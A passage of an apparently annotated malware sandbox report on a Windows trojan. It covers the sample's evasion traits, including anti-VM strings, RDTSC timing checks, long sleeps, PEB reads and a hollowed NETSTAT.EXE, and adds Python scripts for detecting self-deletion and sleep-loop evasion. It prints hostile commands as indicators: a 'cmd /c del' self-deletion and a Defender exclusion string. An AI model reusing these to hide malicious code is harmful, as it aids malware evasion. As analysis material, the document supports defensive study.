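def rec(pid: int, ppid: int, image: str, cmdline: str) -> dict:
    return {"pid": pid, "ppid": ppid, "image": image, "cmdline": cmdline}

# Constructed records mirroring the report's process tree.
PROCS = [
    rec(2600, 900,  r"C:\Windows\explorer.exe", "explorer.exe"),
    rec(7040, 2600, SAMPLE, f'"{SAMPLE}"'),
    rec(7056, 7040, SAMPLE, SAMPLE),                       # re-launched self
    rec(6680, 2600, r"C:\Windows\SysWOW64\NETSTAT.EXE",    # spawned by explorer
        r"C:\Windows\SysWOW64\NETSTAT.EXE"),
    rec(6832, 6680, r"C:\Windows\SysWOW64\cmd.exe", f'/c del "{SAMPLE}"'),
    rec(6844, 6832, r"C:\Windows\System32\conhost.exe",
        r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    rec(7100, 2600, r"C:\Windows\SysWOW64\cmd.exe",        # benign control
        r'/c del "C:\Users\user\AppData\Local\Temp\scratch.txt"'),
]

if __name__ == "__main__":
    for f in find_image_deletions(PROCS):
        print(f)
```

Keying on "image of a process that ran" rather than on the deleter's own ancestry is what catches the proxied variant; the chain in the finding (cmd.exe, NETSTAT.EXE, explorer.exe) is the part an analyst wants to see, because a diagnostic utility launched with no arguments that goes on to spawn cmd.exe is itself the sign of a hollowed host.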
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\Order No00020212910.exe Process information set: NOOPENFILEERRORBOX (35 identical entries)
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 0.2.Order No00020212910.exe.2c1e860.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.290303747.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Order No00020212910.exe PID: 7040, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Order No00020212910.exe, 00000000.00000002.290303747.0000000002BD1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: Order No00020212910.exe, 00000000.00000002.290303747.0000000002BD1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Order No00020212910.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Order No00020212910.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000000B18614 second address: 0000000000B1861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000000B189AE second address: 0000000000B189B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Order No00020212910.exe TID: 7044 Thread sleep time: -37045s >= -30000s
Source: C:\Users\user\Desktop\Order No00020212910.exe TID: 7060 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 6852 Thread sleep time: -45000s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6680 Thread sleep time: -34000s >= -30000s
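The figures above are NtDelayExecution intervals. A negative DelayInterval is a relative wait in 100-nanosecond units, so Sleep(37045) arrives as -370450000 and a value of -922337203685477 (in the report's units) is the most negative 64-bit interval, which is what an INFINITE Win32 sleep is turned into before it reaches the kernel. The following is an added example, not code from the report: it decodes those intervals and applies the report's single-long-wait rule alongside the check it misses, many short waits that add up, which is the "evasive loop" a sandbox that only shortens long sleeps does not see. The report prints the intervals with an `s` suffix but compares them against 30000, which matches a 30-second threshold in milliseconds; the values are read as milliseconds here, an assumption. The call list is constructed: TIDs 7044, 7060 and 6680 carry the intervals the report names, TIDs 9001 and 100 are invented.

```python
"""Added example (not part of the Joe Sandbox report): decode NtDelayExecution
intervals and judge a thread's sleep behaviour the way the "May sleep" and
"Contains long sleeps" checks do.  Intervals are read as milliseconds after
conversion (an assumption about the report's units).  The call list is
constructed: TIDs 7044, 7060 and 6680 and their intervals are the ones the
report names, TID 9001 and TID 100 are invented to show an evasive loop and
a harmless sleep."""
from typing import Dict, List, Tuple

INT64_MIN = -(1 << 63)          # 0x8000000000000000 as a signed LARGE_INTEGER

def decode_delay(interval_100ns: int) -> Dict[str, object]:
    """A negative DelayInterval is a relative wait in 100-ns units, a positive
    one is an absolute time.  INT64_MIN is what Sleep(INFINITE) passes down;
    it decodes to 922337203685477 ms, the figure in the report."""
    if interval_100ns >= 0:
        return {"relative": False, "ms": None, "infinite": False}
    return {"relative": True,
            "ms": (-interval_100ns) // 10_000,
            "infinite": interval_100ns == INT64_MIN}

def assess_sleeps(calls: List[Tuple[int, int]], threshold_ms: int = 30_000,
                  loop_min_calls: int = 10) -> Dict[int, Dict[str, object]]:
    """Per thread: number of relative waits, total and largest requested
    delay, whether any was infinite, and two verdicts.  `flagged` is the
    report's rule (a single wait >= threshold, or an infinite one); `loop_like`
    catches the evasion that rule misses, many short waits adding up to more
    than the threshold, which survives sandboxes that only shorten long sleeps."""
    per: Dict[int, Dict[str, object]] = {}
    for tid, interval in calls:
        d = decode_delay(interval)
        if not d["relative"]:
            continue
        s = per.setdefault(tid, {"count": 0, "total_ms": 0, "max_ms": 0, "infinite": False})
        s["count"] += 1
        s["total_ms"] += d["ms"]
        s["max_ms"] = max(s["max_ms"], d["ms"])
        s["infinite"] = s["infinite"] or d["infinite"]
    for s in per.values():
        s["flagged"] = s["infinite"] or s["max_ms"] >= threshold_ms
        s["loop_like"] = (s["count"] >= loop_min_calls and s["max_ms"] < threshold_ms
                          and s["total_ms"] >= threshold_ms)
    return per

# Constructed (tid, DelayInterval) pairs.
CALLS: List[Tuple[int, int]] = [
    (7044, -370_450_000),            # 37045 ms, as reported for TID 7044
    (7060, INT64_MIN),               # "922337203685477" in the report
    (6680, -340_000_000),            # 34000 ms in NETSTAT.EXE
    (100, -10_000_000),              # 1 s: ordinary
]
CALLS += [(9001, -5_000_000)] * 120  # 120 x 500 ms = 60 s in small pieces

if __name__ == "__main__":
    for tid, s in assess_sleeps(CALLS).items():
        print(tid, s)
```

The infinite wait on TID 7060 is not evasion by itself; a thread parked forever is how a .NET host keeps a background worker alive. Its weight comes from the surrounding entries: the same process also issues a 37-second wait and the sandbox reports that execution stopped while a thread was sleeping.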
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Order No00020212910.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Order No00020212910.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Thread delayed: delay time: 37045
Source: C:\Users\user\Desktop\Order No00020212910.exe Thread delayed: delay time: 922337203685477
Source: Order No00020212910.exe, 00000000.00000002.290303747.0000000002BD1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: Order No00020212910.exe, 00000000.00000002.290303747.0000000002BD1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000A.00000000.314286667.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Order No00020212910.exe, 00000000.00000002.290303747.0000000002BD1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 0000000A.00000000.297928991.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000000A.00000000.314286667.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 0000000A.00000000.294369415.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.294369415.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 0000000A.00000000.314286667.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: Order No00020212910.exe, 00000000.00000002.290303747.0000000002BD1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Enables debug privileges
Source: C:\Users\user\Desktop\Order No00020212910.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F958EC mov eax, dword ptr fs:[00000030h] 5_2_00F958EC
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F940E1 mov eax, dword ptr fs:[00000030h] 5_2_00F940E1
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F940E1 mov eax, dword ptr fs:[00000030h] 5_2_00F940E1
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F940E1 mov eax, dword ptr fs:[00000030h] 5_2_00F940E1
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB8E4 mov eax, dword ptr fs:[00000030h] 5_2_00FBB8E4
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB8E4 mov eax, dword ptr fs:[00000030h] 5_2_00FBB8E4
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCF0BF mov ecx, dword ptr fs:[00000030h] 5_2_00FCF0BF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCF0BF mov eax, dword ptr fs:[00000030h] 5_2_00FCF0BF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCF0BF mov eax, dword ptr fs:[00000030h] 5_2_00FCF0BF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD90AF mov eax, dword ptr fs:[00000030h] 5_2_00FD90AF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC20A0 mov eax, dword ptr fs:[00000030h] 5_2_00FC20A0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC20A0 mov eax, dword ptr fs:[00000030h] 5_2_00FC20A0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC20A0 mov eax, dword ptr fs:[00000030h] 5_2_00FC20A0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC20A0 mov eax, dword ptr fs:[00000030h] 5_2_00FC20A0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC20A0 mov eax, dword ptr fs:[00000030h] 5_2_00FC20A0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC20A0 mov eax, dword ptr fs:[00000030h] 5_2_00FC20A0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F99080 mov eax, dword ptr fs:[00000030h] 5_2_00F99080
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010549A4 mov eax, dword ptr fs:[00000030h] 5_2_010549A4
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010549A4 mov eax, dword ptr fs:[00000030h] 5_2_010549A4
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010549A4 mov eax, dword ptr fs:[00000030h] 5_2_010549A4
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010549A4 mov eax, dword ptr fs:[00000030h] 5_2_010549A4
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010169A6 mov eax, dword ptr fs:[00000030h] 5_2_010169A6
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB0050 mov eax, dword ptr fs:[00000030h] 5_2_00FB0050
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB0050 mov eax, dword ptr fs:[00000030h] 5_2_00FB0050
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010151BE mov eax, dword ptr fs:[00000030h] 5_2_010151BE
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010151BE mov eax, dword ptr fs:[00000030h] 5_2_010151BE
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010151BE mov eax, dword ptr fs:[00000030h] 5_2_010151BE
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010151BE mov eax, dword ptr fs:[00000030h] 5_2_010151BE
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA830 mov eax, dword ptr fs:[00000030h] 5_2_00FBA830
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA830 mov eax, dword ptr fs:[00000030h] 5_2_00FBA830
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA830 mov eax, dword ptr fs:[00000030h] 5_2_00FBA830
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA830 mov eax, dword ptr fs:[00000030h] 5_2_00FBA830
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FAB02A mov eax, dword ptr fs:[00000030h] 5_2_00FAB02A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FAB02A mov eax, dword ptr fs:[00000030h] 5_2_00FAB02A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FAB02A mov eax, dword ptr fs:[00000030h] 5_2_00FAB02A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FAB02A mov eax, dword ptr fs:[00000030h] 5_2_00FAB02A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC002D mov eax, dword ptr fs:[00000030h] 5_2_00FC002D
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC002D mov eax, dword ptr fs:[00000030h] 5_2_00FC002D
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC002D mov eax, dword ptr fs:[00000030h] 5_2_00FC002D
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC002D mov eax, dword ptr fs:[00000030h] 5_2_00FC002D
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC002D mov eax, dword ptr fs:[00000030h] 5_2_00FC002D
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010241E8 mov eax, dword ptr fs:[00000030h] 5_2_010241E8
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01064015 mov eax, dword ptr fs:[00000030h] 5_2_01064015
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01064015 mov eax, dword ptr fs:[00000030h] 5_2_01064015
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01017016 mov eax, dword ptr fs:[00000030h] 5_2_01017016
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01017016 mov eax, dword ptr fs:[00000030h] 5_2_01017016
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01017016 mov eax, dword ptr fs:[00000030h] 5_2_01017016
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F9B1E1 mov eax, dword ptr fs:[00000030h] 5_2_00F9B1E1
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F9B1E1 mov eax, dword ptr fs:[00000030h] 5_2_00F9B1E1
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F9B1E1 mov eax, dword ptr fs:[00000030h] 5_2_00F9B1E1
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB99BF mov ecx, dword ptr fs:[00000030h] 5_2_00FB99BF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB99BF mov ecx, dword ptr fs:[00000030h] 5_2_00FB99BF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB99BF mov eax, dword ptr fs:[00000030h] 5_2_00FB99BF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB99BF mov ecx, dword ptr fs:[00000030h] 5_2_00FB99BF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB99BF mov ecx, dword ptr fs:[00000030h] 5_2_00FB99BF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB99BF mov eax, dword ptr fs:[00000030h] 5_2_00FB99BF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB99BF mov ecx, dword ptr fs:[00000030h] 5_2_00FB99BF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB99BF mov ecx, dword ptr fs:[00000030h] 5_2_00FB99BF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB99BF mov eax, dword ptr fs:[00000030h] 5_2_00FB99BF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB99BF mov ecx, dword ptr fs:[00000030h] 5_2_00FB99BF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB99BF mov ecx, dword ptr fs:[00000030h] 5_2_00FB99BF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB99BF mov eax, dword ptr fs:[00000030h] 5_2_00FB99BF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC61A0 mov eax, dword ptr fs:[00000030h] 5_2_00FC61A0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC61A0 mov eax, dword ptr fs:[00000030h] 5_2_00FC61A0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC2990 mov eax, dword ptr fs:[00000030h] 5_2_00FC2990
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC4190 mov eax, dword ptr fs:[00000030h] 5_2_00FC4190
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01061074 mov eax, dword ptr fs:[00000030h] 5_2_01061074
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01052073 mov eax, dword ptr fs:[00000030h] 5_2_01052073
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBC182 mov eax, dword ptr fs:[00000030h] 5_2_00FBC182
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCA185 mov eax, dword ptr fs:[00000030h] 5_2_00FCA185
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01013884 mov eax, dword ptr fs:[00000030h] 5_2_01013884
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01013884 mov eax, dword ptr fs:[00000030h] 5_2_01013884
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F9B171 mov eax, dword ptr fs:[00000030h] 5_2_00F9B171
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F9B171 mov eax, dword ptr fs:[00000030h] 5_2_00F9B171
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F9C962 mov eax, dword ptr fs:[00000030h] 5_2_00F9C962
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB944 mov eax, dword ptr fs:[00000030h] 5_2_00FBB944
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB944 mov eax, dword ptr fs:[00000030h] 5_2_00FBB944
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC513A mov eax, dword ptr fs:[00000030h] 5_2_00FC513A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC513A mov eax, dword ptr fs:[00000030h] 5_2_00FC513A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0102B8D0 mov eax, dword ptr fs:[00000030h] 5_2_0102B8D0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0102B8D0 mov ecx, dword ptr fs:[00000030h] 5_2_0102B8D0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0102B8D0 mov eax, dword ptr fs:[00000030h] 5_2_0102B8D0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0102B8D0 mov eax, dword ptr fs:[00000030h] 5_2_0102B8D0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0102B8D0 mov eax, dword ptr fs:[00000030h] 5_2_0102B8D0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0102B8D0 mov eax, dword ptr fs:[00000030h] 5_2_0102B8D0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB4120 mov eax, dword ptr fs:[00000030h] 5_2_00FB4120
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB4120 mov eax, dword ptr fs:[00000030h] 5_2_00FB4120
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB4120 mov eax, dword ptr fs:[00000030h] 5_2_00FB4120
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB4120 mov eax, dword ptr fs:[00000030h] 5_2_00FB4120
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB4120 mov ecx, dword ptr fs:[00000030h] 5_2_00FB4120
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F99100 mov eax, dword ptr fs:[00000030h] 5_2_00F99100
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F99100 mov eax, dword ptr fs:[00000030h] 5_2_00F99100
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F99100 mov eax, dword ptr fs:[00000030h] 5_2_00F99100
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC2AE4 mov eax, dword ptr fs:[00000030h] 5_2_00FC2AE4
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0105131B mov eax, dword ptr fs:[00000030h] 5_2_0105131B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC2ACB mov eax, dword ptr fs:[00000030h] 5_2_00FC2ACB
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FAAAB0 mov eax, dword ptr fs:[00000030h] 5_2_00FAAAB0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FAAAB0 mov eax, dword ptr fs:[00000030h] 5_2_00FAAAB0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCFAB0 mov eax, dword ptr fs:[00000030h] 5_2_00FCFAB0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F952A5 mov eax, dword ptr fs:[00000030h] 5_2_00F952A5
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F952A5 mov eax, dword ptr fs:[00000030h] 5_2_00F952A5
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F952A5 mov eax, dword ptr fs:[00000030h] 5_2_00F952A5
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F952A5 mov eax, dword ptr fs:[00000030h] 5_2_00F952A5
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F952A5 mov eax, dword ptr fs:[00000030h] 5_2_00F952A5
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01068B58 mov eax, dword ptr fs:[00000030h] 5_2_01068B58
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCD294 mov eax, dword ptr fs:[00000030h] 5_2_00FCD294
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCD294 mov eax, dword ptr fs:[00000030h] 5_2_00FCD294
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0104D380 mov ecx, dword ptr fs:[00000030h] 5_2_0104D380
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD927A mov eax, dword ptr fs:[00000030h] 5_2_00FD927A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0105138A mov eax, dword ptr fs:[00000030h] 5_2_0105138A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD5A69 mov eax, dword ptr fs:[00000030h] 5_2_00FD5A69
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD5A69 mov eax, dword ptr fs:[00000030h] 5_2_00FD5A69
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD5A69 mov eax, dword ptr fs:[00000030h] 5_2_00FD5A69
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01065BA5 mov eax, dword ptr fs:[00000030h] 5_2_01065BA5
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F99240 mov eax, dword ptr fs:[00000030h] 5_2_00F99240
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F99240 mov eax, dword ptr fs:[00000030h] 5_2_00F99240
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F99240 mov eax, dword ptr fs:[00000030h] 5_2_00F99240
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F99240 mov eax, dword ptr fs:[00000030h] 5_2_00F99240
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010153CA mov eax, dword ptr fs:[00000030h] 5_2_010153CA
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010153CA mov eax, dword ptr fs:[00000030h] 5_2_010153CA
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB236 mov eax, dword ptr fs:[00000030h] 5_2_00FBB236
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB236 mov eax, dword ptr fs:[00000030h] 5_2_00FBB236
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB236 mov eax, dword ptr fs:[00000030h] 5_2_00FBB236
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB236 mov eax, dword ptr fs:[00000030h] 5_2_00FBB236
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB236 mov eax, dword ptr fs:[00000030h] 5_2_00FBB236
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB236 mov eax, dword ptr fs:[00000030h] 5_2_00FBB236
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD4A2C mov eax, dword ptr fs:[00000030h] 5_2_00FD4A2C
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD4A2C mov eax, dword ptr fs:[00000030h] 5_2_00FD4A2C
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA229 mov eax, dword ptr fs:[00000030h] 5_2_00FBA229
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA229 mov eax, dword ptr fs:[00000030h] 5_2_00FBA229
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA229 mov eax, dword ptr fs:[00000030h] 5_2_00FBA229
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA229 mov eax, dword ptr fs:[00000030h] 5_2_00FBA229
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA229 mov eax, dword ptr fs:[00000030h] 5_2_00FBA229
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA229 mov eax, dword ptr fs:[00000030h] 5_2_00FBA229
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA229 mov eax, dword ptr fs:[00000030h] 5_2_00FBA229
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA229 mov eax, dword ptr fs:[00000030h] 5_2_00FBA229
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA229 mov eax, dword ptr fs:[00000030h] 5_2_00FBA229
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB3A1C mov eax, dword ptr fs:[00000030h] 5_2_00FB3A1C
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010423E3 mov ecx, dword ptr fs:[00000030h] 5_2_010423E3
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010423E3 mov ecx, dword ptr fs:[00000030h] 5_2_010423E3
